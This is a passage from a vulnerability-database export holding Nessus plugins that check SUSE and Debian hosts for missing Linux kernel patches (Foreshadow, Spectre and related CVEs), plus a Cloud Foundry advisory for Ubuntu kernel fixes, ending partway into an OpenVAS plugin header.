from SUSE update advisory SUSE-SU-2018:2387-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111839);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/09/10 13:51:48\");\n\n script_cve_id(\"CVE-2017-11600\", \"CVE-2017-18344\", \"CVE-2018-10853\", \"CVE-2018-3646\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:2387-1) (Foreshadow)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 4.4.74-92_38 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2018-3646: Local attackers in virtualized guest\n systems could use speculative code patterns on\n hyperthreaded processors to read data present in the L1\n Datacache used by other hyperthreads on the same CPU\n core, potentially leaking sensitive data, even from\n other virtual machines or the host system (bsc#1099306).\n\n - CVE-2017-18344: The timer_create syscall implementation\n in kernel/time/posix-timers.c didn't properly validate\n the sigevent->sigev_notify field, which lead to\n out-of-bounds access in the show_timer function (called\n when /proc/$PID/timers is read). This allowed userspace\n applications to read arbitrary kernel memory (on a\n kernel built with CONFIG_POSIX_TIMERS and\n CONFIG_CHECKPOINT_RESTORE) (bsc#1103203). before 4.14.8\n\n - CVE-2017-11600: net/xfrm/xfrm_policy.c did not ensure\n that the dir value of xfrm_userpolicy_id is\n XFRM_POLICY_MAX or less, which allowed local users to\n cause a denial of service (out-of-bounds access) or\n possibly have unspecified other impact via an\n XFRM_MSG_MIGRATE xfrm Netlink message (bsc#1096564)\n\n - CVE-2018-10853: A flaw was found in kvm. 
In which\n certain instructions such as sgdt/sidt call\n segmented_write_std didn't propagate access correctly.\n As such, during userspace induced exception, the guest\n can incorrectly assume that the exception happened in\n the kernel and panic. (bsc#1097108).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1096564\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1097108\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1099306\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1103203\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11600/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-18344/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10853/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-3646/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20182387-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8ba52771\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2018-1651=1\n\nSUSE 
Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2018-1651=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_74-92_38-default\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! 
preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kgraft-patch-4_4_74-92_38-default-11-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:18:48", "bulletinFamily": "scanner", "description": "The previous update to linux failed to build for the armhf (ARM EABI\nhard-float) architecture. This update corrects that. For all other\narchitectures, there is no need to upgrade or reboot again. For\nreference, the relevant part of the original advisory text follows.\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-5715\n\nMultiple researchers have discovered a vulnerability in various\nprocessors supporting speculative execution, enabling an attacker\ncontrolling an unprivileged process to read memory from arbitrary\naddresses, including from the kernel and all other processes running\non the system.\n\nThis specific attack has been named Spectre variant 2\n(branch target injection) and is mitigated for the x86\narchitecture (amd64 and i386) by using new microcoded\nfeatures.\n\nThis mitigation requires an update to the processor", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DLA-1422.NASL", "href": "https://www.tenable.com/plugins/nessus/111082", "published": "2018-07-16T00:00:00", "title": "Debian DLA-1422-2 : linux security update (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin 
were\n# extracted from Debian Security Advisory DLA-1422-2. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111082);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/07/15 14:20:30\");\n\n script_cve_id(\"CVE-2017-5715\", \"CVE-2017-5753\", \"CVE-2018-1000204\", \"CVE-2018-1066\", \"CVE-2018-10853\", \"CVE-2018-1093\", \"CVE-2018-10940\", \"CVE-2018-1130\", \"CVE-2018-11506\", \"CVE-2018-12233\", \"CVE-2018-3665\", \"CVE-2018-5814\", \"CVE-2018-9422\");\n\n script_name(english:\"Debian DLA-1422-2 : linux security update (Spectre)\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The previous update to linux failed to build for the armhf (ARM EABI\nhard-float) architecture. This update corrects that. For all other\narchitectures, there is no need to upgrade or reboot again. For\nreference, the relevant part of the original advisory text follows.\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-5715\n\nMultiple researchers have discovered a vulnerability in various\nprocessors supporting speculative execution, enabling an attacker\ncontrolling an unprivileged process to read memory from arbitrary\naddresses, including from the kernel and all other processes running\non the system.\n\nThis specific attack has been named Spectre variant 2\n(branch target injection) and is mitigated for the x86\narchitecture (amd64 and i386) by using new microcoded\nfeatures.\n\nThis mitigation requires an update to the processor's\nmicrocode, which is non-free. 
For recent Intel processors,\nthis is included in the intel-microcode package from version\n3.20180425.1~deb8u1. For other processors, it may be\nincluded in an update to the system BIOS or UEFI firmware,\nor in a later update to the amd64-microcode package.\n\nThis vulnerability was already mitigated for the x86\narchitecture by the 'retpoline' feature.\n\nCVE-2017-5753\n\nFurther instances of code that was vulnerable to Spectre variant 1\n(bounds-check bypass) have been mitigated.\n\nCVE-2018-1066\n\nDan Aloni reported to Red Hat that the CIFS client implementation\nwould dereference a NULL pointer if the server sent an invalid\nresponse during NTLMSSP setup negotiation. This could be used by a\nmalicious server for denial of service.\n\nThe previously applied mitigation for this issue was not\nappropriate for Linux 3.16 and has been replaced by an\nalternate fix.\n\nCVE-2018-1093\n\nWen Xu reported that a crafted ext4 filesystem image could trigger an\nout-of-bounds read in the ext4_valid_block_bitmap() function. A local\nuser able to mount arbitrary filesystems could use this for denial of\nservice.\n\nCVE-2018-1130\n\nThe syzbot software found that the DCCP implementation of sendmsg()\ndoes not check the socket state, potentially leading to a NULL pointer\ndereference. A local user could use this to cause a denial of service\n(crash). \n\nCVE-2018-3665\n\nMultiple researchers have discovered that some Intel x86 processors\ncan speculatively read floating-point and vector registers even when\naccess to those registers is disabled. 
The Linux kernel's 'lazy FPU'\nfeature relies on that access control to avoid saving and restoring\nthose registers for tasks that do not use them, and was enabled by\ndefault on x86 processors that do not support the XSAVEOPT\ninstruction.\n\nIf 'lazy FPU' is enabled on one of the affected processors,\nan attacker controlling an unprivileged process may be able\nto read sensitive information from other users' processes or\nthe kernel. This specifically affects processors based on\nthe 'Nehalem' and 'Westmere' core designs. This issue has\nbeen mitigated by disabling 'lazy FPU' by default on all x86\nprocessors that support the FXSAVE and FXRSTOR instructions,\nwhich includes all processors known to be affected and most\nprocessors that perform speculative execution. It can also\nbe mitigated by adding the kernel parameter: eagerfpu=on\n\nCVE-2018-5814\n\nJakub Jirasek reported race conditions in the USB/IP host driver. A\nmalicious client could use this to cause a denial of service (crash or\nmemory corruption), and possibly to execute code, on a USB/IP server.\n\nCVE-2018-9422\n\nIt was reported that the futex() system call could be used by an\nunprivileged user for privilege escalation.\n\nCVE-2018-10853\n\nAndy Lutomirski and Mika Penttilä reported that KVM for x86\nprocessors did not perform a necessary privilege check when emulating\ncertain instructions. This could be used by an unprivileged user in a\nguest VM to escalate their privileges within the guest.\n\nCVE-2018-10940\n\nDan Carpenter reported that the optical disc driver (cdrom) does not\ncorrectly validate the parameter to the CDROM_MEDIA_CHANGED ioctl. A\nuser with access to a cdrom device could use this to cause a denial of\nservice (crash).\n\nCVE-2018-11506\n\nPiotr Gabriel Kosinski and Daniel Shapira reported that the SCSI\noptical disc driver (sr) did not allocate a sufficiently large buffer\nfor sense data. 
A user with access to a SCSI optical disc device that\ncan produce more than 64 bytes of sense data could use this to cause a\ndenial of service (crash or memory corruption), and possibly for\nprivilege escalation.\n\nCVE-2018-12233\n\nShankara Pailoor reported that a crafted JFS filesystem image could\ntrigger a denial of service (memory corruption). This could possibly\nalso be used for privilege escalation.\n\nCVE-2018-1000204\n\nThe syzbot software found that the SCSI generic driver (sg) would in\nsome circumstances allow reading data from uninitialised buffers,\nwhich could include sensitive information from the kernel or other\ntasks. However, only privileged users with the CAP_SYS_ADMIN or\nCAP_SYS_RAWIO capability were allowed to do this, so this has little\nor no security impact.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n3.16.57-1. This update additionally fixes Debian bug #898165, and\nincludes many more bug fixes from stable update 3.16.57.\n\nWe recommend that you upgrade your linux packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/07/msg00016.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/linux\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-compiler-gcc-4.8-arm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-compiler-gcc-4.8-x86\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-compiler-gcc-4.9-x86\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-doc-3.16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-586\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-686-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-all\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-all-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-all-armel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-all-armhf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-all-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-armmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-armmp-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-ixp4xx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-kirkwood\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-orion5x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-versatile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-586\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-686-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-686-pae-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-armmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-armmp-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-ixp4xx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-kirkwood\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-orion5x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-versatile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-libc-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-manual-3.16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-source-3.16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-support-3.16.0-9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen-linux-system-3.16.0-9-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/16\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"linux-compiler-gcc-4.8-arm\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-compiler-gcc-4.8-x86\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-compiler-gcc-4.9-x86\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-doc-3.16\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-586\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-686-pae\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-amd64\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-armel\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-armhf\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-all-i386\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-amd64\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-armmp\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", 
prefix:\"linux-headers-3.16.0-9-armmp-lpae\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-common\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-ixp4xx\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-kirkwood\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-orion5x\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-versatile\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-586\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-686-pae\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-686-pae-dbg\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-amd64\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-amd64-dbg\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-armmp\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-armmp-lpae\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-ixp4xx\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-kirkwood\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-orion5x\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-versatile\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-libc-dev\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-manual-3.16\", reference:\"3.16.57-2\")) flag++;\nif 
(deb_check(release:\"8.0\", prefix:\"linux-source-3.16\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-support-3.16.0-9\", reference:\"3.16.57-2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"xen-linux-system-3.16.0-9-amd64\", reference:\"3.16.57-2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:50", "bulletinFamily": "software", "description": "# \n\n# Severity\n\nHigh\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 16.04\n\n# Description\n\nUSN-3777-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 18.04 LTS for Ubuntu 16.04 LTS.\n\nJann Horn discovered that the vmacache subsystem did not properly handle sequence number overflows, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2018-17182)\n\nIt was discovered that the paravirtualization implementation in the Linux kernel did not properly handle some indirect calls, reducing the effectiveness of Spectre v2 mitigations for paravirtual guests. A local attacker could use this to expose sensitive information. (CVE-2018-15594)\n\nIt was discovered that microprocessors utilizing speculative execution and prediction of return addresses via Return Stack Buffer (RSB) may allow unauthorized memory reads via sidechannel attacks. An attacker could use this to expose sensitive information. (CVE-2018-15572)\n\nAndy Lutomirski and Mika Penttil\u00e4 discovered that the KVM implementation in the Linux kernel did not properly check privilege levels when emulating some instructions. 
An unprivileged attacker in a guest VM could use this to escalate privileges within the guest. (CVE-2018-10853)\n\nIt was discovered that a stack-based buffer overflow existed in the iSCSI target implementation of the Linux kernel. A remote attacker could use this to cause a denial of service (system crash). (CVE-2018-14633)\n\nIt was discovered that a memory leak existed in the IRDA subsystem of the Linux kernel. A local attacker could use this to cause a denial of service (kernel memory exhaustion). (CVE-2018-6554)\n\nIt was discovered that a use-after-free vulnerability existed in the IRDA implementation in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-6555)\n\nCVEs contained in this USN include: CVE-2018-10853, CVE-2018-14633, CVE-2018-15572, CVE-2018-15594, CVE-2018-17182, CVE-2018-6554, CVE-2018-6555\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is high unless otherwise noted._\n\n * Cloud Foundry BOSH xenial-stemcells are vulnerable, including: \n * 97.x versions prior to 97.19\n * All other stemcells not listed.\n\n# Mitigation\n\nUsers of affected products are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH xenial-stemcells: \n * Upgrade 97.x versions to 97.19\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io/stemcells/#ubuntu-xenial>).\n\n# References\n\n * [USN-3777-2](<https://usn.ubuntu.com/3777-2>)\n * [CVE-2018-10853](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10853>)\n * [CVE-2018-14633](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14633>)\n * [CVE-2018-15572](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15572>)\n * [CVE-2018-15594](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15594>)\n * 
[CVE-2018-17182](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17182>)\n * [CVE-2018-6554](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6554>)\n * [CVE-2018-6555](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6555>)\n", "modified": "2018-10-09T00:00:00", "published": "2018-10-09T00:00:00", "id": "CFOUNDRY:2AA1F360A02E665F9D2B19AB7EF0CAA9", "href": "https://www.cloudfoundry.org/blog/usn-3777-2/", "title": "USN-3777-2: Linux kernel (HWE) vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:33:20", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-18T00:00:00", "published": "2018-10-02T00:00:00", "id": "OPENVAS:1361412562310843647", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843647", "title": "Ubuntu Update for linux USN-3777-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3777_1.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for linux USN-3777-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or 